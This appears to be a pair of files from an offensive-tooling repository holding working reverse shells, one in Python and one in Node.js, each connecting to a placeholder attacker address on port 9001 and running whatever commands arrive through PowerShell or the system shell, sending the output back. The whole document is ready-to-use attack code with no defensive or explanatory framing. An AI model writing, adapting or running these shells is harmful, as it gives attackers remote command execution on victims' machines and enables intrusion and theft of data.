File: Clasic_Rever_Shell/Python/Clasic4.py
# Windows (Linux/macOS).
import socket
import subprocess
import sys

def main():
    host = 'IP_ADDRESS'
    port = 9001
    
    try:
        # Create TCP socket and connect
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        
        # Send initial prompt
        sock.sendall(b'SHELL> ')
        
        while True:
            # Receive command
            data = sock.recv(4096)
            if not data:
                break
            
            # Decode command (remove trailing newline if present)
            command = data.decode('utf-8').rstrip('\n')
            
            if command.lower() == 'exit':
                break
            
            try:
                # Execute command using PowerShell on Windows or shell on Unix
                if sys.platform == 'win32':
                    # Use PowerShell on Windows
                    result = subprocess.run(
                        ['powershell', '-Command', command],
                        capture_output=True,
                        text=True,
                        shell=True,
                        timeout=30
                    )
                    output = result.stdout + result.stderr
                else:
                    # Use bash on Unix-like systems
                    result = subprocess.run(
                        command,
                        shell=True,
                        capture_output=True,
                        text=True,
                        timeout=30
                    )
                    output = result.stdout + result.stderr
                    
            except subprocess.TimeoutExpired:
                output = "Command timed out after 30 seconds\n"
            except Exception as e:
                output = f"Error executing command: {str(e)}\n"
            
            # Send output with prompt
            response = output + 'SHELL> '
            sock.sendall(response.encode('utf-8'))
    
    except ConnectionRefusedError:
        print(f"Connection refused to {host}:{port}")
    except socket.timeout:
        print("Connection timeout")
    except Exception as e:
        print(f"Error: {str(e)}")
    finally:
        try:
            sock.close()
        except:
            pass

if __name__ == "__main__":
    main()

File: Clasic_Rever_Shell/JavaScript/Clasic4.js
// Windows (Linux/macOS).
const net = require('net');
const { exec } = require('child_process');

function main() {
    const host = 'IP_ADDRESS';
    const port = 9001;

    const client = new net.Socket();

    client.connect(port, host, () => {
        client.write('SHELL> ');
    });

    client.on('data', (data) => {
        const command = data.toString().trim();

        if (command.toLowerCase() === 'exit') {
            client.destroy();
            return;
        }

        const shellCommand = process.platform === 'win32' ? `powershell -Command "${command}"` : command;

        exec(shellCommand, { timeout: 30000 }, (error, stdout, stderr) => {
            let output = stdout + stderr;
            if (error) {
                output += `Error executing command: ${error.message}\n`;
            }
            client.write(output + 'SHELL> ');
        });
    });

    client.on('error', (err) => {
        console.error(`Error: ${err.message}`);
    });

    client.on('close', () => {
        console.log('Connection closed');
    });
}

main();